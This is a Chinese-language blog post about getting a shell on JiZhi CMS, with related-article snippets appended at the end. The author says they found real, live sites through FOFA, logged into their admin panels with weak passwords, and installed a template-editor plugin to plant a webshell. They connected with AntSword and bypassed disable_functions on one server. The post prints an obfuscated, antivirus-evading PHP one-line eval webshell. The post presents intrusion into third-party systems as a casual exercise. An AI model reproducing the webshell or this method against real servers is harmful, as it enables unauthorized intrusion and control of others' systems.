记某CMS漏洞getshell

VSole2021-11-04 08:13:44

记极致CMS漏洞getshell

今天下午比较空闲,就去搜索一些cms,突然对极致CMS感兴趣,而网上已经有一些文章对它进行分析利用,sql注入,xss,后台修改上传后缀名前台getshell等等。

于是就引起了我的兴趣想去测试一下。

信息收集

还是因为自己太懒,不想搭建环境,然后就想网上有好多网站啊,随便找一个去看看。hhh然后去利用fofa去搜索。(不能随便乱日)

弱密码yyds

搜索了一些网站,我们直接在url后面添加/admin.php,就直接跳到后台登录的地方。

看到后台?!嗯~,测试了sql无果,想一想万一有弱密码呢?试一试也没有啥。

然后就测试了弱密码,你懂的。

然后成功登录~ 仿佛就看到了shell就在我面前了。


因为之前有师傅发过前台上传文件getshell了,那我这里就不进行测试了。直接寻找另一个方法getshell。

和平常的框架一样,登录后台之后就需要去测试功能点,然后我们就一个一个的去测试吧~(这里大概过了有40分钟 2333~)

唯一我感觉利用点就存在系统设置中的高级设置,我们可以选择上传的后缀名,不过这里是前台的上传啊,后台虽然有上传点但是一直绕过不了。难受死了,心里又不甘心在前台上传getshell,在岂不是很没有面子(傲娇)

这里一直后台没有绕过~~~ 2333~

柳暗花明又一村

想一想,如果要利用后台,那肯定是一些功能的问题,那我们就去认真找一下网站功能,找来找去就发现一个上传点,有点难受了。过了好久,突然想起了后台有一个扩展管理啊,应该说肯定可以下载一下插件来更加功能的吧。

然后就凭着感觉和功能去看看那些插件可以利于。发现了一个在线编辑模板的插件

这里可能是ctfer的自觉吧~因为之前打过的ctf题基本上是可以利于编辑插件进行修改代码,就可以getshell。话不多说就开始尝试。先下载了该模块并进行安装。

安装前我们还是看看安装说明。万一错误了怎么办!

意思就是我们安装的时候还需要设置密码,并且该目录权限比较高,777就让我看到了shell的希望

然后就设置密码登录密码。

成功登录之后就看到了这个页面我当时直接嗨了起了(np!!!)

进入这个页面,那岂不是可以修改代码了,嘿嘿嘿~ 那不是shell唾手可得!

写shell连蚁剑

测试了该插件的功能,发现只能修改代码还不能写文件,嗯~。那也简单啊,我们先在已存在的php页面上写入一句话,然后蚁剑连接,创建文件写shell,之后在删除之前修改的代码。

这里分享一个免杀的小马

<?php
$a = $GLOBALS;
$str = '_POST';
eval/**nice**/(''. $a[$str]['cf87efe0c36a12aec113cd7982043573']. NULL);
?>

这里写入我们的一句话木马

然后就是蚁剑去连接啦。看到蚁剑存在了一个绿色东西,长叹一口气~(不过如此)

连接成功居然不能执行???

心里又难受了一下~~~

然后去看看到底过滤了那些函数。并且php版本是5.6

绕disable_functions(没成功)

然后直接上蚁剑的插件,然后发现是5.6 并且是windows 呜呜呜 不会 直接告辞~

虽然没有成功执行命令,但也是一个getshell的思路。

啊~烦~。但是渗透人怎么能认输~

俗话说得好,拿不下就换一个(需要表哥们可以给一些意见学习一下~)

进行收集信息

进行重复上面的操作又获得一个网站。并且还是通过弱口令获得~

弱口令yyds

getshell执行命令

这里的步骤和前面一样,因为有前面的步骤,而这个shell就简单多了。

也成功获得蚁剑连接。

并且还是不能执行命令,但是看到了linux系统就想,肯定比windows好多了啊。

于是就开始绕disable_functions,系统信息是这样的,那直接蚁剑一把梭。

成功绕过,这不就成功了!!!

总结

极致CMS还是存在很多漏洞的。这里小弟只是抛砖引玉而已。

而写到这里的时候已经是晚上了,提权的话还是后面文章在说吧。

简单的说一下就是该漏洞是主要存在于cms后台插件的位置,允许用户修改代码,而这没有过滤就造成了巨大的风险。

漏洞shell
本作品采用《CC 协议》,转载必须注明作者和本文链接
RCE系统交互条件与受限环境下的利用
研究人员在TorchServe中发现多个高分漏洞,影响数万AI 服务器。
redis弱密码漏洞利用
2021-11-25 07:00:19
redis无认证,或者弱密码,可以成功连接到redis服务器 反弹shell拿到的权限取决于redis的启动账号 操作: 1. Centos7安装redis客户端 #yum install redis --查看是否有redis yum 源#yum install epel-release --下载fedora的epel仓库# yum install redis -
妨碍数据利用的诸多因素
今天分享一篇文章,涉及Redis未授权、SSRF漏洞、宽字节注入、JSONP劫持、CORS、CRLF注入等技能,并详细讲述了其原理和漏洞利用等。能够回连且权限够的话,写crontab利用计划任务执行命令反弹shell?图片加载与下载:通过URL地址加载或下载图片?禁用不需要的协议。禁止30x跳转Java和PHP的SSRF区别PHP支持的协议:
部分getshell漏洞汇总
2022-07-20 10:12:45
即可未授权访问console后台,但是权限比较低备注:此处会出现个问题,在复现的环境中直接拼接
当我们渗透一个网站时发现从网站渗透不进去的时候,就可以查看该网站主机开启了哪些端口,来从其开启的端口来进行入侵
Apache 软件基金会已发布修复程序以包含一个积极 利用的零日漏洞,该漏洞会影响广泛使用的基于 Java 的 Apache Log4j 日志库,该漏洞可被武器化以执行恶意代码并允许完全接管易受攻击的系统。
分析漏洞的本质是为了能让我们从中学习漏洞挖掘者的思路以及挖掘到新的漏洞,而CodeQL就是一款可以将我们对漏洞的理解快速转化为可实现的规则并挖掘漏洞的利器。根据网上的传言Log4j2的RCE漏洞就是作者通过CodeQL挖掘出的。虽然如何挖掘的我们不得而知,但我们现在站在事后的角度再去想想,可以推测一下作者如何通过CodeQL挖掘到漏洞的,并尝试基于作者的思路挖掘新漏洞
全球数万个太阳能光伏发电站所采用的太阳能发电监控系统曝出严重漏洞,远程攻击者目前正积极利用该漏洞破坏运营或在系统中驻留。研究人员指出,目前超过三分之二的使用Contec设备的光伏电站尚未安装漏洞CVE-2022-29303的补丁更新。Contec设备的漏洞可能会导致使用它们的光伏电站设施失去对运营的可见性,可能会导致严重后果,具体取决于易受攻击的设备的部署位置。
VSole
网络安全专家